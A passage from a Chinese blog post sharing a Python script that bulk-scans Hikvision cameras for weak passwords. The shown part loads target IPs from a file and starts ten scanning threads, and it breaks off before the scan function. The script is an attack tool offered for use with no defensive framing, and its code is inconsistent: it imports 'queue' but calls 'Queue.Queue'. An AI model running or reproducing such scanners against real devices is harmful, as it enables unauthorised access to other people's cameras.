Python海康威视批量扫弱密码
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396335 是Python2还是3我给忘记了,大家自己试试吧。 #!/usr/bin/env python #-*-coding:utf-8-*- #批量筛选海康威视摄像头的弱密码 import threading import requests import queue import sys import re def Threads(): threadlist=[] queue=Queue.Queue() for ip in open('ip.txt','r'): #扫描出的ip queue.put(ip.replace('\n','')) for x in range(0,10): #线程数 th=threading.Thread(target=scan_Hikvision,args=(queue,)) threadlist.append(th) for t in threadlist...